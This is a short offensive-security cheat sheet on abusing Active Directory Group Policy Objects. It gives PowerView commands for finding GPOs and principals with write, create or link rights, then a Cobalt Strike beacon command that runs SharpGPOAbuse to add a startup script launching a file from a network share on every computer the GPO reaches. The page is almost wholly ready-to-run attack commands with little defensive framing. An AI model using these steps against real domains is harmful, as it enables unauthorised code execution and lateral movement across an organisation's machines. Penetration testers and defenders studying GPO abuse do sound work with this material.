A Group Policy Object (GPO) is a collection of Group Policy settings. Each GPO consists of settings applied to selected OUs. GPOs can be created by domain admins and those groups or users who have been delegated the rights (usually these groups may be able to configure GPOs directed to selected OUs). After creation, GPOs must be linked to an OU to take effect.
Modify
Requirements
Look for GPOs with special ACLs:
Get-DomainGPO | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ActiveDirectoryRights -match "CreateChild|WriteProperty" -and $_.SecurityIdentifier -match "S-1-5-21-569305411-121244042-2357301523-[\d]{4,10}" }Acquire GPO information:
# Get its name and location on filesystem
Get-DomainGPO -Identity "CN={[guid]},CN=Policies,CN=System,DC=[domain-dn]" | select displayName, gpcFileSysPath
# Get linked OU
Get-DomainOU -GPLink "{[guid]}" | select distinguishedNameTo modify a GPO, edit files in \\[machine-fqdn]\SysVol\[domain-fqdn]\Policies\{[guid]} or do so with a tools like SharpGPOAbuse:
beacon> execute-assembly C:\Tools\SharpGPOAbuse\SharpGPOAbuse\bin\Release\SharpGPOAbuse.exe --AddComputerScript --ScriptName startup.bat --ScriptContents "start /b \\[domain]\[share]\[file-name]" --GPOName "[GPO to modify]"
# wait for a GPO update (or run gpupdate /force) and rebootCreate
To check if RSAT tooling is installed on this machine:
Get-Module -List -Name GroupPolicy | select -expand ExportedCommandsCreate a GPO:
New-GPO -Name "[GPO Name]"Look for principals allowed to create GPOs (PowerView):
Get-DomainObjectAcl -Identity "CN=Policies,CN=System,[domain-dn]" -ResolveGUIDs | ? { $_.ObjectAceType -eq "Group-Policy-Container" -and $_.ActiveDirectoryRights -contains "CreateChild" } | % { ConvertFrom-SID $_.SecurityIdentifier }Look for principals allowed to link GPOs to OUs (PowerView):
Get-DomainOU | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ObjectAceType -eq "GP-Link" -and $_.ActiveDirectoryRights -match "WriteProperty" } | select ObjectDN,ActiveDirectoryRights,ObjectAceType,SecurityIdentifier | fl